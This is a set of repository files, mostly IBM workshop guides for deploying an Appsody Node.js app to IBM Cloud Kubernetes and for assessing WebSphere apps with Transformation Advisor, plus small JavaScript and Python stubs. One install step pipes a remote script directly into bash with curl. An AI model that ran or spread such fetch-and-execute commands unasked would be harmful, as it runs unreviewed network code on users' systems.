to IBM Cloud](https://img.youtube.com/vi/U4meXJWV4us/maxresdefault.jpg)](https://www.youtube.com/watch?v=U4meXJWV4us) <file_sep># Cloud Native Development Workshop We will be using Appsody from Kabanero Project for this hands on. ### 1. Sign up on Docker https://hub.docker.com/ ### 2. Get the environment https://www.katacoda.com/courses/ubuntu/playground1804 Sign in using your gmail id. ### 3. Check the OS ``` $ cat /etc/os-release ``` output should be ``` NAME="Ubuntu" VERSION="18.04.2 LTS (Bionic Beaver)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 18.04.2 LTS" VERSION_ID="18.04" HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" VERSION_CODENAME=bionic UBUNTU_CODENAME=bionic ``` ### 4. Install Appsody Get installable ``` $ wget https://github.com/appsody/appsody/releases/download/0.2.8/appsody_0.2.8_amd64.deb $ sudo apt install ./appsody_0.2.8_amd64.deb ``` ### 5. Login to IBM Cloud CLI For Mac or Linux: -> To install latest version of the IBM Cloud CLI, run the command: `$ curl -sL https://ibm.biz/idt-installer | bash ` -> To verify that the CLI and Developer tools were installed successfully, run the help command: `$ ibmcloud dev help` Output lists the usage instructions, the current version, and the supported commands. -> Now configure your environment, log in to IBM Cloud with your IBMid. `$ ibmcloud login` -> To access Cloud Foundry services, you must specify a Cloud Foundry org and space. You can run the following command to interactively identify the org and space: `$ ibmcloud target --cf` Or, if you know which org and space that the service belongs to, you can use the following command: `$ ibmcloud target -o <value> -s <value>` The above commands are also available in the web page: https://cloud.ibm.com/docs/cli?topic=cloud-cli-getting-started ### 6. Connect to your Kubernetes cluster created on IBM Cloud. Go to browser and login to IBM Cloud UI. https://cloud.ibm.com/login ![GitHub Logo](images/dashboard.png) _From the Dashboard, click on the Kubernetes cluster._ ![GitHub Logo](images/cluster.png) _ Click on Connect via CLI. _ ![GitHub Logo](images/connectcli.png) _A pop-up window will appear._ ![GitHub Logo](images/popup.png) ![GitHub Logo](images/popup2.png) Execute the commands from your pop-up window on the command prompt. ### 7. Create Projects Appsody First, choose a development stack. To see all the available stacks, run: ``` $ appsody list ``` Create a new directory for your project and run appsody init <stack> to download the template project. The following example uses the nodejs-express stack to create a fully functional Appsody project: ``` $ mkdir illustration $ cd illustration $ appsody init nodejs-express ``` ### 8. Start the development container: ``` $ appsody run ``` ### 9. Check your application is running Now the project is running in a docker container, and the container is linked to the project source code on your local system. Great! Open New terminal ``` $ curl http://localhost:3000 ``` OR open in browser: http://localhost:3000 You should see out put as ``` "Hello from Appsody!" ``` ### 10. Change the code Now let's try changing the code. Edit the file app.js to output something other than "Hello from Appsody!". When you save the file, Appsody picks up the change and automatically updates the container. Run ``` $ curl http://localhost:3000 ``` OR If using Mac/Linux local machine command prompt, open in browser: http://localhost:3000 to see the new message! ### 11. Now, let's tag and push the container onto docker hub and deploy the image to your IBM Kubernetes cluster. In the command prompt, login to docker with your username/password. Sign up if you are a new user. ``` $ docker login ``` -> Build the container ``` $ appsody build ``` -> Tag and push the image to docker hub ``` $ docker tag <app-name> <docker_user>/<app-name> ``` For this appsody project: ``` $ docker tag illustration myDockerUsername/illustration ``` Now push: ``` $ docker push <docker_user>/<app-name> ``` For this appsody project: ``` $ docker push myDockerUsername/illustration ``` -> Deploy. ``` $ appsody deploy ``` One step command to build, tag, push and deploy the development container on to the Kubernetes cluster: ``` $ appsody deploy --tag <dockerhub-space>/<app-name>:<version> --push ``` In this case: ``` $ appsody deploy --tag <mydocker-username>/illustration:1 --push ``` Output: : : Attempting to get resource from Kubernetes ... Running command: kubectl[get svc sampleapp -o jsonpath=http://{.status.loadBalancer.ingress[0].hostname}:{.spec.ports[0].nodePort} --namespace default] Deployed project running at http://:31649 Note the port number that the project is deployed on. Fetch the external IP of your cluster with the command: ``` $ kubectl get node -o wide ``` ### 12. Check your application is running If using Mac/Linux local machine command prompt, open your web browser with http://[external-ip-cluster]:[port-no] OR Open New terminal ``` $ curl http://[external-ip-cluster]:[port-no] ``` You should see the message output. When you're all done, you can stop the environment. <file_sep># Modernize Applications using Transformation Advisor Local ## Introduction The process of modernizing applications and moving to the cloud can be a large undertaking. Careful planning is needed to prepare business inventory and infrastructure and to determine the best path forward for each application. If you don't yet have a cloud platform but are ready to begin the assessment for your modernization journey, this lab can help you get started. The IBM Transformation Advisor Local (Beta) is a tool that quickly evaluates your on-premises applications for rapid deployment on WebSphere Application Server and Liberty on public or private cloud environments. Transformation Advisor supports legacy applications running on the following platforms: * WebSphere Application Server * JBoss AS * Oracle Web Logic * Apache Tomcat * Plain Old Java Objects running in a JVM ## Pre-requisite 1) Before you can install IBM Cloud™ Transformation Advisor Local (Beta), go to the Registration and download site to download the files and accept license terms. [https://www.ibm.com/account/reg/in-en/signup?formid=urx-38642](https://www.ibm.com/account/reg/in-en/signup?formid=urx-38642) 2) Then, make sure that you meet the prerequisites for your operating system and follow the installation instructions. Docker Desktop or Docker Toolbox is required to run Transformation Advisor locally on Windows. For Linux and MacOS you need Docker and Docker Compose. ### Installation on Linux/MacOS This task covers how to install IBM Transformation Advisor locally on Linux or MacOS. Before you start, ensure that the following products are installed: #### Pre-requisite on Linux/MacOS * Docker: [https://docs.docker.com/docker-for-mac/install/](https://docs.docker.com/docker-for-mac/install/) [https://docs.docker.com/install/linux/docker-ce/ubuntu/#install-docker-engine---community-1](https://docs.docker.com/install/linux/docker-ce/ubuntu/#install-docker-engine---community-1) * Docker Compose: [https://docs.docker.com/compose/install/](https://docs.docker.com/compose/install/) #### Get started with Transformation Advisor installation on Linux/MacOS 1) Create a directory for the Transformation Advisor files, for example, ta_local. Copy the .zip file that you downloaded during the registration step into this directory and extract it: unzip transformationAdvisor.zip 2) To install Transformation Advisor locally, run the following command: ./launchTransformationAdvisor.sh 3) Select 1 if you agree with the terms of the License. 4) Select 1 to install Transformation Advisor. ![GitHub Logo](images/install_options.png) 5) After the installation is complete, you can access Transformation Advisor locally at the following URLs. The host name or IP address and port are provided by the installation program. ![GitHub Logo](images/install_complete.png) Linux: http://< host name >:< port > MacOS: http://< IP Address >:< port > ![GitHub Logo](images/landingPage.png) ### For Windows: Watch this video to install on windows: https://youtu.be/45xiAUDhiMk #### Pre-requisite on Windows Download Docker Desktop for Windows: https://docs.docker.com/docker-for-windows/install/ Sign in to docker: https://hub.docker.com/editions/community/docker-ce-desktop-windows #### Get started with Transformation Advisor installation on Windows 1) Create a folder, say "ta_local". Download the Docker Desktop for Windows executable to this folder. 2) Enable shared drives so that Transformation Advisor can mount volumes: a. Open the Docker Desktop for Windows menu by right-clicking the Docker icon in the Notifications area. b. Select Settings. c. Click Shared Drives. d. Check the box for the C drive. e. To apply shared drives, enter your Windows system (domain) user name and password. If your username and password are not accepted, refer to the [Docker Troubleshooting documentation](https://docs.docker.com/docker-for-windows/troubleshoot/#verify-domain-user-has-permissions-for-shared-drives-volumes) for permissions issues with shared drives. 3) Create a ta_local directory, for example C:\Users\ta_local\dockerCompose, and put the .env and Docker-compose.yml files there. 4) Open a terminal session.Change to the directory where the Docker-compose.yml and .env files are located. 5) Make sure that Docker is running: docker ps 6) Pull the Transformation Advisor images: docker-compose pull 7) Start the containers and run them in the background: docker-compose up -d 8) Verify that three containers are created: docker ps You see something similar to the following output: ibmcom/transformation-advisor-ui:latest ibmcom/transformation-advisor-server:latest ibmcom/transformation-advisor-db:latest 9) Access the Transformation Advisor UI at the following URL: http://< host >:2221 # Exploring Transformation Advisor In this short lab - 1) You will run Transformation Advisor against the data collected from an instance of WebSphere Application Server V8.5.5 and examine the recommendations provided for a different Java EE applications. 2) You will then look at the artifacts generated for one those apps (the later version of the WebSphere sample app Plants By WebSphere) for deployment on a Liberty container running in Kubernetes using the migration bundle generated for this app by Transformation Advisor. ### Step 1: Getting Started with the Transformation Advisor Transformation Advisor organizes your legacy server scans into workspaces and collections. Specific server scans are typically put into to separate collections. You'll use a completed server scan as a starting point for the lab 1. Download the server scan by right clicking on [this link](https://github.com//IBMAppModernization/app-modernization-ta-explore-lab/raw/master/ta/AppSrv01.zip) and selecting **Save Link As** from the context menu to save the file locally. 2. Go to the homepage of the Transformation Advisor. (The URL obtained from the Installation steps). 3. Click on **Add a new workspace** 4. Enter a unique name for your workspace e.g. `usernnn_ta_workspace` where `usernnn` is your assigned user ID (e.g. `user011`) 5. Click **Next** and enter a name for the collection e.g. `lab_collection` 6. Click **Let's go** ### Step 2: Download and run the Data Collector 1. At this point you have the option of downloading a data collection script for your legacy server to collect the data about all the installed applications or upload the results of a data collection script. Click **Upload data** then click **Drop or Add File** and select the file **AppSrv01.zip** you downloaded previously. ![Uploading data collection file](images/ss1.png) 2. Click **Upload** to upload the file ### Step 2: View the recommendations and cost estimates 1. Check the Recommendations tab to view the results as described in the next step. You should be presented with a summary of recommendations for 4 applications running on the WebSphere Application Server instance where the data collection script was run. ![Recommendations summary](images/ss2.png) 2. Lets look at the apps designated with red to indicate that changes to the app are required before running the app on WebSphere Liberty. Click on the link for the app **petstore-WAS.ear**. This is a Java EE 5 app written by the Java BluePrints program that validates several Java EE 5 features. ![Pet Store](images/ss3.png) 3. Scroll down to the bottom of the page and click on **Analysis Report**. Click **OK** when prompted. 4. The analysis will open up in a new browser tab. Scroll down to the section with title **Detailed Results by Rule** and click on **Show rule help** next to the rule named **The JSF SunRI engine was removed** to see more details about what needs to be fixed to migrate the Java Pet Store app to WebSphere Liberty running on ICP. Take a look at some of the other information in the report to get a feel for what type of information to expect when running Transformation Advisor against your own legacy Java EE apps. ![Sun JSF RI](images/ss4.png) 5. Go back to the **IBM Transformation** browser tab and click on **<- Recommendations** to go back to the list of apps. ![Recommendation link](images/ss5.png) 6. This time take a look at one of the "show stoppers" for the app **plants-by-websphere-jee5.ear** by selecting the app and then clicking on the Analysis Report link. This version of the WebSphere sample Plants by WebSphere was shipped with WebSphere Application Server V7.0. Two of the three severe issues have to do with no support for the JAX-RPC API in Liberty. Note: with the explosion of REST based APIs, technologies like JAX-RPC and SOAP/WSDL have become more or less obsolete. 7. Go back to the **IBM Transformation** browser tab and click on **<- Recommendations** to go back to the list of apps. 8. Now you'll look at the migration plan for the app **plants-by-websphere-jee6-mysql.ear**. This is the Plants By WebSphere app that comes with WebSphere Application Server 8.5.5 and has been tweaked to work with the MySQL database instead of the embedded Apache Derby database that the original uses. Note that this version uses JAX-RS (the Java API for RESTful Web Services) instead of JAX-RPC and JAX-RS is fully supported on WebSphere Liberty. Click on **Migration plan** as shown below ![Migration Plan](images/ss6.png) 9. On the left you should see a list of files generated to aid the migration of the app to Liberty running in IBM Cloud Pak for Applications on Private Cloud . On the right click the link **View the steps ->** ![View the steps](images/ss7.png) 10. Note that various options are supported including a Dockerfile, a helm chart and manifest for deployment to any Kubernetes cluster (IBM Cloud Private, Open Shift, IBM Cloud Kubernetes Service etc). 11. Look through the migration steps. You'll be (more or less) following these steps if you use this tool to aid in the migration of your own legacy apps to a modern containerized environment. # Experience Centre for TA See how the IBM Cloud Paks can accelerate your journey to the cloud with access to a hosted environment. Follow the documentation in the link https://github.ibm.com/ispandey/TAWorkshop , to learn how to gather data about your applications, assess their cloud readiness, and chart your roadmap to application modernization. ## Summary You've gone through the process of evaluating various legacy WebSphere Application Server apps for migration to a containerized version running on WebSphere Liberty in Kubernetes.
a005730ab813ddc5867c15532336eada17be3b57
[ "Markdown", "JavaScript" ]
13
Markdown
IBMDevConnect/appmod-workshops
a4468852d5e245394a5ed55e7a9c303fd767c4a9
e66e414bf4a0631e2042944262098e5d1bce28a2
refs/heads/master
<repo_name>lukasgor/react-native-auth<file_sep>/index.ios.js import { AppRegistry } from 'react-native'; import App from './src/App'; const func = () => { return ( 1 ) } AppRegistry.registerComponent('auth', () => App)
39ea775aaf44ac3e5e8d57e2a23a47c39bec94d7
[ "JavaScript" ]
1
JavaScript
lukasgor/react-native-auth
23d5c534b8afacbf5245a1371c7bbb9fe0cd3956
a3387f51dbc80019ce25122d5cf9560c8a672440
refs/heads/master
<repo_name>iamamirshabir/DIPS-UI<file_sep>/src/main/java/com/pioneer/dips/symptoms/repository/symptomRepository.java package com.pioneer.dips.symptoms.repository; import org.springframework.data.jpa.repository.JpaRepository; import com.pioneer.dips.symptoms.model.Symptom; public interface symptomRepository extends JpaRepository<Symptom, Long> { } <file_sep>/src/main/java/com/pioneer/dips/diagnosis/DiseaseClassifierController.java package com.pioneer.dips.diagnosis; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; //import org.springframework.hateoas.EntityModel; //import org.springframework.hateoas.IanaLinkRelations; //import org.springframework.http.ResponseEntity; import org.springframework.web.bind.annotation.GetMapping; //import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestBody; import org.springframework.web.bind.annotation.RestController; import weka.classifiers.bayes.NaiveBayesUpdateable; @Configuration @RestController public class DiseaseClassifierController { DiseaseClassifier dc= new DiseaseClassifier(); static final NaiveBayesUpdateable nb =new NaiveBayesUpdateable(); static final String file = "dis_sym_dataset_comb.arff"; @GetMapping("/api/diagnosis") void diagnosis(@RequestBody String token ) { //return ResponseEntity. } @Bean void trainClassifier() { try { String token = "0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"; dc.buildClassifier(nb, file); dc.classify(nb, token); } catch (Exception e) { // TODO Auto-generated catch block e.printStackTrace(); } } }
c7a3acb4edb49468ff5b12ec5aee6cf6349bcdc2
[ "Java" ]
2
Java
iamamirshabir/DIPS-UI
8957f99f649c488b8b876fe24129114e470c6dc7
fb6617549c7596bd154beaac386ee2bcade7a05b
refs/heads/master
<file_sep>public class BunkerLoanInfo { //Payment Information panel private double tLoanAmount; private double mPayment; private double tPayment; private double salesTaxAmount; //Loan Term Panel private double loanTerm; private double loanRate; //Financing Information panel private double basePrice; private double dPayment; private double salesTax; //Price with Options panel private Double totalPWO; //Constructor public BunkerLoanInfo(){ loanTerm = 0.045; salesTax = 0.07; totalPWO = 1200.0; } //Sets Loan Term and allows it to be retrieved public void setLoanTerm(double lT){ loanTerm = lT; } public double getLoanTerm(){ return(loanTerm); } //Sets Loan Rate and allows it to be retrieved public void setLoanRate(double lR){ loanRate = lR; } public double getLoanRate(){ return(loanRate); } //Sets Base Price and allows it to be retrieved public void setBasePrice(double bP){ basePrice = bP; } public double getBasePrice(){ return(basePrice); } //Sets Down Payment and allows it to be retrieved public void setDownPayment(double dP){ dPayment = dP; } public double getDownPayment(){ return(dPayment); } //Sets Sales Tax and allow sit to be retrieved public void setSalesTax(double sT){ salesTax = sT /100; } public double getSalesTax(){ return(salesTax); } //Sets Price with Options and allows it to be retrieved public void setPWO(double pwo){ totalPWO = pwo; } public double getPWO(){ return(totalPWO); } //Calculates Sales Tax Amount public double calculateSalesTaxAmount(){ salesTaxAmount = (basePrice - dPayment + totalPWO) * salesTax; return(salesTaxAmount); } //Calculates Loan Amount public double calculateLoanAmount(){ tLoanAmount = basePrice - dPayment + totalPWO + calculateSalesTaxAmount(); return(tLoanAmount); } //Calculates Monthly Payment public double calculateMonthlyPayment(){ mPayment = calculateLoanAmount() * (loanRate/12) / (1 - (Math.pow(1 / (1 + (loanRate/12)), loanTerm))); return(mPayment); } //Calculates Total Payment public double calculateTotalPayment(){ tPayment = calculateMonthlyPayment() * getLoanTerm() + getDownPayment(); return(tPayment); } }<file_sep>import javax.swing.*; @SuppressWarnings("serial") public class LoanCalculateGUI extends JFrame { private CombinedPanels CP; private int width = 700; private int height = 500; public LoanCalculateGUI(){ //Adds combined panels object CP = new CombinedPanels(); //Sets title setTitle("BunkerTech LLC"); setSize(width, height); //Sets close operation setDefaultCloseOperation(DISPOSE_ON_CLOSE); //setLayout(new FlowLayout()); setLocationRelativeTo(null); //Adds combined panels to frame add(CP); //Makes it visible setVisible(true); } }<file_sep>import java.awt.*; import javax.swing.*; @SuppressWarnings("serial") public class Header extends JPanel { private JLabel ALC; public Header(){ setLayout(new FlowLayout()); //Creates Auto Loan Calculator Label ALC = new JLabel("BUNKER LOAN CALCULATOR", SwingConstants.CENTER); ALC.setFont(new Font("Source Code Pro", Font.PLAIN, 16)); //Sets foreground and background colors ALC.setForeground(Color.YELLOW); setBackground(Color.GRAY); //Add to panel add(ALC); } }<file_sep>import javax.swing.*; import java.awt.*; import java.awt.event.ActionListener; @SuppressWarnings("serial") public class LoanTerm extends JPanel { private ButtonGroup bg; private JRadioButton twoFour; private JRadioButton threeSix; private JRadioButton fourEight; private JRadioButton sixZero; private double loanTerm; private double loanRate; public LoanTerm(ActionListener e){ setLayout(new GridLayout(4,1)); //Creates Radio Buttons twoFour = new JRadioButton("24 Months - Interest Rate of 4.5%", true); threeSix = new JRadioButton("36 Months - Interest Rate of 5.5%"); fourEight = new JRadioButton("48 Months - Interest Rate of 6.5%"); sixZero = new JRadioButton("60 Months - Interest Rate of 7.0%"); //Adds them to button group bg = new ButtonGroup(); bg.add(twoFour); bg.add(threeSix); bg.add(fourEight); bg.add(sixZero); twoFour.addActionListener(e); threeSix.addActionListener(e); fourEight.addActionListener(e); sixZero.addActionListener(e); //Adds them to panel add(twoFour); add(threeSix); add(fourEight); add(sixZero); //Creates Border setBorder(BorderFactory.createTitledBorder("Loan Term")); } public void setLoanRate(double lr){ loanRate = lr; } public void setLoanTerm(double lt){ loanTerm = lt; } //Allows loanRate and loanTerm to be retrieved public double getLoanRate(){ return(loanRate); } public double getLoanTerm(){ return(loanTerm); } public void setLoanTerm(boolean t){ twoFour.setSelected(t); } }<file_sep># BunkerLoanCalculator Calculator for projects <file_sep>import javax.swing.*; import java.awt.*; @SuppressWarnings("serial") public class FinanceInfo extends JPanel { private JLabel basePrice; private JLabel dPay; private JLabel salesTax; private JTextField bP; private JTextField dP; private JTextField sT; public FinanceInfo(){ setLayout(new GridLayout(3,2)); //Creates labels and text-fields basePrice = new JLabel("Base Contract Price:"); bP = new JTextField("0.00"); dPay = new JLabel("Down Payment:"); dP = new JTextField("0.00"); salesTax = new JLabel("Sales Tax Percentage:"); sT = new JTextField("7.00"); //Adds them to panel add(basePrice); add(bP); add(dPay); add(dP); add(salesTax); add(sT); //Creates border setBorder(BorderFactory.createTitledBorder("Financing Information")); } //Allows base price to be retrieved public String getBasePrice(){ return(bP.getText()); } //Allows down payment to be retrieved public String getDownPayment(){ return(dP.getText()); } //Allows sales tax to be retrieved public String getSalesTax(){ return(sT.getText()); } public void setBasePrice(String bp){ bP.setText(bp); } public void setDownPayment(String dp){ dP.setText(dp); } public void setSalesTax(String st){ sT.setText(st); } }<file_sep>import javax.swing.*; import java.awt.*; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; import java.text.DecimalFormat; @SuppressWarnings("serial") public class CombinedPanels extends JPanel { private JPanel center; private Header Head; private PaymentInfo PI; private LoanTerm LT; private FinanceInfo FI; private PWO pwo; private ActionButtons AB; private BunkerLoanInfo BLI; public CombinedPanels(){ setLayout(new BorderLayout()); center = new JPanel(); center.setLayout(new GridLayout(2,2)); //Creates instance of BunkerLoanInfo BLI = new BunkerLoanInfo(); //Creates instances of all the panels Head = new Header(); PI = new PaymentInfo(); LT = new LoanTerm(new LoanTermListener()); FI = new FinanceInfo(); pwo = new PWO(); AB = new ActionButtons(); AB.setListener(new ExitButtonListener()); AB.setListener(new CalculateButtonListener()); AB.setListener(new ResetButtonListener()); //Adds particular panels to a combined panel center.add(PI); center.add(LT); center.add(FI); center.add(pwo); //Adds panels to appropriate location add(Head, BorderLayout.NORTH); add(center, BorderLayout.CENTER); add(AB, BorderLayout.SOUTH); //Sends values from panel components to BunkerInfoLoan BLI.setPWO(pwo.getPWO()); BLI.setBasePrice(Double.parseDouble(FI.getBasePrice())); BLI.setDownPayment(Double.parseDouble(FI.getDownPayment())); BLI.setSalesTax(Double.parseDouble(FI.getSalesTax())); BLI.setLoanRate(LT.getLoanRate()); BLI.setLoanTerm(LT.getLoanTerm()); } private class LoanTermListener implements ActionListener{ public void actionPerformed(ActionEvent e){ //Sets loanRate and loanTerm depending on what radio button is selected if(e.getActionCommand().equals("24 Months - Interest Rate of 4.5%")){ LT.setLoanRate(0.045); LT.setLoanTerm(24.0); } else if(e.getActionCommand().equals("36 Months - Interest Rate of 5.5%")){ LT.setLoanRate(0.055); LT.setLoanTerm(36.0); } else if(e.getActionCommand().equals("48 Months - Interest Rate of 6.5%")){ LT.setLoanRate(0.065); LT.setLoanTerm(48.0); } else if(e.getActionCommand().equals("60 Months - Interest Rate of 7.0%")){ LT.setLoanRate(0.07); LT.setLoanTerm(60.0); } } } private class ResetButtonListener implements ActionListener{ public void actionPerformed(ActionEvent e){ if(e.getActionCommand().equals("Reset")){ PI.reset(); LT.setLoanTerm(true); FI.setBasePrice("0.00"); FI.setDownPayment("0.00"); FI.setSalesTax("7.00"); pwo.setPWO(true); } } } //Exits the program private class ExitButtonListener implements ActionListener{ public void actionPerformed(ActionEvent e){ if(e.getActionCommand().equals("Exit")){ System.exit(0); } } } //Calculates Total Loan Amount, Monthly Payment, and Total Payment private class CalculateButtonListener implements ActionListener{ public void actionPerformed(ActionEvent e){ if(e.getActionCommand().equals("Calculate")){ DecimalFormat df = new DecimalFormat("$#,##0.00"); double loanAmount; double monthlyPayment; double totalPayment; BLI.setPWO(pwo.getPWO()); BLI.setBasePrice(Double.parseDouble(FI.getBasePrice())); BLI.setDownPayment(Double.parseDouble(FI.getDownPayment())); BLI.setSalesTax(Double.parseDouble(FI.getSalesTax())); BLI.setLoanRate(LT.getLoanRate()); BLI.setLoanTerm(LT.getLoanTerm()); loanAmount = BLI.calculateLoanAmount(); monthlyPayment = BLI.calculateMonthlyPayment(); totalPayment = BLI.calculateTotalPayment(); PI.setTMP(String.valueOf(df.format(monthlyPayment))); PI.setTLA(String.valueOf(df.format(loanAmount))); PI.setTPA(String.valueOf(df.format(totalPayment))); } } } } <file_sep> public class Project1Driver { public static void main(String[] args) { @SuppressWarnings("unused") LoanCalculateGUI LCG = new LoanCalculateGUI(); } }
a757798850f35b344f48204768a908e0172dc504
[ "Markdown", "Java" ]
8
Java
Justin-Jason/BunkerLoanCalculator
288ca4ae00e67ff094460119820d133b1010f529
8e782830f9e5a70b636cc93fab305a7255473fcf
refs/heads/master
<repo_name>Vukkk/WebhookDiscordTokenGrabber<file_sep>/Grabbing.cs using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.IO; using System.Diagnostics; using System.Text.RegularExpressions; using System.Net.Http; namespace WebhookDiscordTokenGrabber { public class Grabbing { public static void KillDiscord() { try { Process[] processes = Process.GetProcessesByName("Discord"); foreach (var process in processes) { process.Kill(); } } catch { return; } } public static string DropboxToken = "<KEY>"; // PASTE YOUR DROPBOX DEVELOPER APP TOKEN HERE. (GIVE THE APP FULL ACCESS TO YOUR DROPBOX!) public static void UploadLogFile() { var files = SearchForFile(); // to get log files if (files.Count == 0) { Console.WriteLine("Didn't find any log files"); return; } foreach (string token in files) { foreach (Match match in Regex.Matches(token, "[^\"]*")) { if (match.Length == 59) { Console.WriteLine($"Token={match.ToString()}"); using (StreamWriter sw = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\writtenlogtoken.txt", true)) { sw.WriteLine($"Token={match.ToString()}"); } } } } string uploadfile = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\writtenlogtoken.txt"; List<string> SearchForFile() { List<string> ldbFiles = new List<string>(); string discordPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\"; if (!Directory.Exists(discordPath)) { Console.WriteLine("Discord path not found"); return ldbFiles; } foreach (string file in Directory.GetFiles(discordPath, "*.log", SearchOption.TopDirectoryOnly)) { string rawText = File.ReadAllText(file); if (rawText.Contains("oken")) { Console.WriteLine($"{Path.GetFileName(file)} added"); ldbFiles.Add(rawText); } } return ldbFiles; } } public static void UploadldbFile() { var files = SearchForFile(); // to get ldb files if (files.Count == 0) { Console.WriteLine("Didn't find any ldb files"); return; } foreach (string token in files) { foreach (Match match in Regex.Matches(token, "[^\"]*")) { if (match.Length == 59) { Console.WriteLine($"Token={match.ToString()}"); using (StreamWriter sw = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\writtenldbtoken.txt", true)) { sw.WriteLine($"Token={match.ToString()}"); } } } } string uploadfile = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\writtenldbtoken.txt"; List<string> SearchForFile() { List<string> ldbFiles = new List<string>(); string discordPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\"; if (!Directory.Exists(discordPath)) { Console.WriteLine("Discord path not found"); return ldbFiles; } foreach (string file in Directory.GetFiles(discordPath, "*.ldb", SearchOption.TopDirectoryOnly)) { string rawText = File.ReadAllText(file); if (rawText.Contains("oken")) { Console.WriteLine($"{Path.GetFileName(file)} added"); ldbFiles.Add(rawText); } } return ldbFiles; } } private static readonly string _hookUrl = "abcdefghijklmnopqrstuvwxyz"; // PASTE YOUR WEBHOOK URL HERE public static void ReportTokens(/*List<string> tokenReport*/) { try { string writtenldbtoken = System.IO.File.ReadAllText(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\writtenldbtoken.txt"); //.ldb upload try { HttpClient client = new HttpClient(); Dictionary<string, string> contents = new Dictionary<string, string> { { "content", $"Token report for '{Environment.UserName}'\n\n{string.Join("\n", writtenldbtoken)}" }, { "username", "WDTG by Kai" }, { "avatar_url", "https://cdn.discordapp.com/attachments/737989668242456688/737995846389596160/wdtg_avatar.PNG" } }; client.PostAsync(_hookUrl, new FormUrlEncodedContent(contents)).GetAwaiter().GetResult(); } catch { } } catch { Console.WriteLine("writtenldbtoken.txt is not found"); } try { string writtenlogtoken = System.IO.File.ReadAllText(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\writtenlogtoken.txt"); //.log upload try { HttpClient client = new HttpClient(); Dictionary<string, string> contents = new Dictionary<string, string> { { "content", $"Token report for '{Environment.UserName}'\n\n{string.Join("\n", writtenlogtoken)}" }, { "username", "WDTG by Kai" }, { "avatar_url", "https://cdn.discordapp.com/attachments/737989668242456688/737995846389596160/wdtg_avatar.PNG" } }; client.PostAsync(_hookUrl, new FormUrlEncodedContent(contents)).GetAwaiter().GetResult(); } catch { } } catch { Console.WriteLine("writtenlogtoken.txt is not found"); } } } } <file_sep>/README.md # WebhookDiscordTokenGrabber Steals and uploads discord tokens to the given webhook address ## Steps: - Clone or download the source code - Open Solution - In Grabbing.cs at line 140 paste your own discord webhook - Compile the program - Run it on a choosen computer ## Buy me a coffee ☕: **[PayPal](https://www.paypal.me/iklevi)** ## Ps.: **I am not responsible for anything you are doing with this project. I made this project for educational purposes.** *This project is licensed under the MIT License.* <file_sep>/Program.cs using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace WebhookDiscordTokenGrabber { class Program { static void Main(string[] args) { Grabbing.KillDiscord(); System.Threading.Thread.Sleep(7000); Grabbing.UploadLogFile(); Grabbing.UploadldbFile(); Grabbing.ReportTokens(); } } }
1b20e8f8713f295f168f97ccb601a0aebdfcee32
[ "Markdown", "C#" ]
3
C#
Vukkk/WebhookDiscordTokenGrabber
ea1e98577e67a37b86187729ff3ab6404c348eba
9a847cb3e8e91aed4d077f2310f16b9cbdb07e1f
refs/heads/master
<repo_name>RoyKedem/git-example<file_sep>/file.py x = input("hello world")
c4b5e99c996bc98577dcdb247e57b10a3b81e1c3
[ "Python" ]
1
Python
RoyKedem/git-example
